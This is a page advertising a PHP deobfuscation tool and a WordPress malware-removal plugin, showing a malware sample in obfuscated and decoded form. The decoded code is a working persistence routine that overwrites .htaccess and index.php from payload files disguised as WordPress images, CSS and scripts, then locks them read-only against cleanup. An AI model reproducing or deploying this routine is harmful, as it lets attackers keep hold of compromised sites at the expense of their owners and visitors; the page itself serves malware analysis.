Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php goto at9QW; dc2tV: uMArh: goto ZutTz; cBUsJ: @chmod($mQtyQ, 0444); goto L6JN4; zvABo: $pLNSZ = $_SERVER["\104\x4f\103\x55\115\x45\x4e\x54\x5f\122\x4f\x4f\x54"] . "\x2f\x77\160\55\151\156\x63\x6c\165\144\145\163\x2f\151\155\141\147\x65\163\x2f\163\x6d\151\154\x69\x65\x73\x2f\151\143\x6f\156\...



Obfuscated php code

<?php
 goto at9QW; dc2tV: uMArh: goto ZutTz; cBUsJ: @chmod($mQtyQ, 0444); goto L6JN4; zvABo: $pLNSZ = $_SERVER["\104\x4f\103\x55\115\x45\x4e\x54\x5f\122\x4f\x4f\x54"] . "\x2f\x77\160\55\151\156\x63\x6c\165\144\145\163\x2f\151\155\141\147\x65\163\x2f\163\x6d\151\154\x69\x65\x73\x2f\151\143\x6f\156\x5f\x77\151\x6e\153\x73\x2e\x70\x6e\147"; goto sN587; at9QW: $s6U7E = $_SERVER["\104\x4f\x43\x55\x4d\x45\116\x54\x5f\x52\117\x4f\x54"] . "\x2f\56\x68\164\x61\143\x63\x65\163\163"; goto dTBIZ; F70YZ: if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($pLNSZ))) { goto vQRBl; } goto jICTR; JLsSe: $xYKW0 = $_SERVER["\104\x4f\103\x55\x4d\105\x4e\x54\x5f\x52\x4f\117\124"] . "\x2f\167\160\55\x69\x6e\x63\154\x75\x64\x65\163\x2f\151\155\141\x67\x65\x73\57\155\x65\x64\x69\141\x2f\141\144\x6d\x69\156\56\160\x6e\147"; goto pGdn_; nk4IS: jjhrc: goto dc2tV; jXWoq: $q0X5P = $_SERVER["\x44\117\103\x55\115\x45\x4e\x54\137\122\x4f\x4f\124"] . "\57\167\x70\x2d\x69\x6e\x63\154\165\144\x65\x73\x2f\x6a\163\57\152\161\165\145\x72\171\57\x6a\x71\165\145\162\x79\x2e\155\x61\163\157\156\x72\x79\56\x6a\163"; goto JLsSe; L6JN4: vQRBl: goto NjGnF; sN587: $LMTxG = $_SERVER["\x44\x4f\103\125\115\x45\x4e\124\x5f\122\x4f\x4f\x54"] . "\57\x77\x70\55\x69\156\x63\x6c\165\144\x65\163\x2f\152\x73\x2f\144\x69\163\164\x2f\x70\x72\145\146\145\x72\x65\x6e\143\145\x73\55\x70\x65\x72\163\x69\x73\x74\x65\156\143\x65\x2e\x6d\x6e\151\x2e\x6a\163"; goto JmdmE; JIzIC: @file_put_contents($s6U7E, file_get_contents($xYKW0)); goto auDqS; qJKls: if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($q0X5P))) { goto D5CQL; } goto KlbX2; gtoAL: jkwvK: goto hGGn2; sJ2Vk: V9jnE: goto W2ZGv; Ixk0q: Bno8a: goto Slwhg; PFLqb: $GSag0 = $_SERVER["\x44\117\103\125\115\105\116\124\x5f\x52\x4f\117\x54"] . "\x2f\x77\160\55\x61\x64\x6d\x69\x6e\x2f\x63\x73\163\57\143\157\154\157\162\x73\x2f\x73\165\x6e\162\x69\x73\145\57\x63\157\x6c\x6f\162\163\55\x72\164\x6c\x2e\155\151\x6e\56\143\163\163"; goto jXWoq; F7NN_: @chmod($mQtyQ, 0444); goto gtoAL; auDqS: @chmod($s6U7E, 0444); goto G_uyz; G_uyz: CWTEI: goto Ixk0q; InO50: @chmod($s6U7E, 0444); goto nk4IS; tS2xt: @file_put_contents($mQtyQ, file_get_contents($LMTxG)); goto F7NN_; TSLEY: if (!($mQtyQ && file_exists($pLNSZ))) { goto MTb9m; } goto F70YZ; JmdmE: if (!($s6U7E && file_exists($GSag0))) { goto uMArh; } goto TrYkG; vKH9R: @file_put_contents($s6U7E, file_get_contents($q0X5P)); goto DQn2u; yL1jV: HrQDu: goto ipI3P; zyPjF: @chmod($s6U7E, 0644); goto JIzIC; EJ1v0: @file_put_contents($mQtyQ, file_get_contents($pLNSZ)); goto cBUsJ; pGdn_: $xMqTe = $_SERVER["\x44\117\103\x55\115\105\x4e\124\x5f\x52\x4f\x4f\x54"] . "\57\167\x70\x2d\x61\144\155\151\x6e\x2f\151\155\x61\x67\x65\163\x2f\x70\x6f\x73\x74\x2d\146\157\162\x6d\x61\164\163\55\141\x73\56\x70\x6e\147"; goto zvABo; W_Xr9: D5CQL: goto sJ2Vk; hTZWr: if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($xMqTe))) { goto HrQDu; } goto Qb8lN; ZutTz: if (!($s6U7E && file_exists($q0X5P))) { goto V9jnE; } goto qJKls; Slwhg: if (!($mQtyQ && file_exists($xMqTe))) { goto XbVsR; } goto hTZWr; fDP1g: @file_put_contents($mQtyQ, file_get_contents($xMqTe)); goto aWLhD; WBiOH: if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($LMTxG))) { goto jkwvK; } goto myOAl; IPxGP: @file_put_contents($s6U7E, file_get_contents($GSag0)); goto InO50; W2ZGv: if (!($s6U7E && file_exists($xYKW0))) { goto Bno8a; } goto GGZOJ; QwiGa: if (!($mQtyQ && file_exists($LMTxG))) { goto sCkB3; } goto WBiOH; NjGnF: MTb9m: goto QwiGa; aWLhD: @chmod($mQtyQ, 0444); goto yL1jV; dTBIZ: $mQtyQ = $_SERVER["\104\x4f\x43\125\x4d\105\116\124\x5f\x52\117\117\124"] . "\x2f\151\x6e\x64\x65\170\56\160\x68\x70"; goto PFLqb; jICTR: @chmod($mQtyQ, 0644); goto EJ1v0; ipI3P: XbVsR: goto TSLEY; GGZOJ: if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($xYKW0))) { goto CWTEI; } goto zyPjF; Qb8lN: @chmod($mQtyQ, 0644); goto fDP1g; DQn2u: @chmod($s6U7E, 0444); goto W_Xr9; myOAl: @chmod($mQtyQ, 0644); goto tS2xt; TrYkG: if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($GSag0))) { goto jjhrc; } goto EMoXR; KlbX2: @chmod($s6U7E, 0644); goto vKH9R; EMoXR: @chmod($s6U7E, 0644); goto IPxGP; hGGn2: sCkB3:

Decoded(de-Obfuscated) php code

<?php

$s6U7E = $_SERVER["DOCUMENT_ROOT"] . "/.htaccess";
$mQtyQ = $_SERVER["DOCUMENT_ROOT"] . "/index.php";
$GSag0 = $_SERVER["DOCUMENT_ROOT"] . "/wp-admin/css/colors/sunrise/colors-rtl.min.css";
$q0X5P = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/js/jquery/jquery.masonry.js";
$xYKW0 = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/images/media/admin.png";
$xMqTe = $_SERVER["DOCUMENT_ROOT"] . "/wp-admin/images/post-formats-as.png";
$pLNSZ = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/images/smilies/icon_winks.png";
$LMTxG = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/js/dist/preferences-persistence.mni.js";
if (!($s6U7E && file_exists($GSag0))) {
    goto uMArh;
}
if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($GSag0))) {
    goto jjhrc;
}
@chmod($s6U7E, 0644);
@file_put_contents($s6U7E, file_get_contents($GSag0));
@chmod($s6U7E, 0444);
jjhrc:
uMArh:
if (!($s6U7E && file_exists($q0X5P))) {
    goto V9jnE;
}
if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($q0X5P))) {
    goto D5CQL;
}
@chmod($s6U7E, 0644);
@file_put_contents($s6U7E, file_get_contents($q0X5P));
@chmod($s6U7E, 0444);
D5CQL:
V9jnE:
if (!($s6U7E && file_exists($xYKW0))) {
    goto Bno8a;
}
if (!(!file_exists($s6U7E) or filesize($s6U7E) != filesize($xYKW0))) {
    goto CWTEI;
}
@chmod($s6U7E, 0644);
@file_put_contents($s6U7E, file_get_contents($xYKW0));
@chmod($s6U7E, 0444);
CWTEI:
Bno8a:
if (!($mQtyQ && file_exists($xMqTe))) {
    goto XbVsR;
}
if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($xMqTe))) {
    goto HrQDu;
}
@chmod($mQtyQ, 0644);
@file_put_contents($mQtyQ, file_get_contents($xMqTe));
@chmod($mQtyQ, 0444);
HrQDu:
XbVsR:
if (!($mQtyQ && file_exists($pLNSZ))) {
    goto MTb9m;
}
if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($pLNSZ))) {
    goto vQRBl;
}
@chmod($mQtyQ, 0644);
@file_put_contents($mQtyQ, file_get_contents($pLNSZ));
@chmod($mQtyQ, 0444);
vQRBl:
MTb9m:
if (!($mQtyQ && file_exists($LMTxG))) {
    goto sCkB3;
}
if (!(!file_exists($mQtyQ) or filesize($mQtyQ) != filesize($LMTxG))) {
    goto jkwvK;
}
@chmod($mQtyQ, 0644);
@file_put_contents($mQtyQ, file_get_contents($LMTxG));
@chmod($mQtyQ, 0444);
jkwvK:
sCkB3:

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.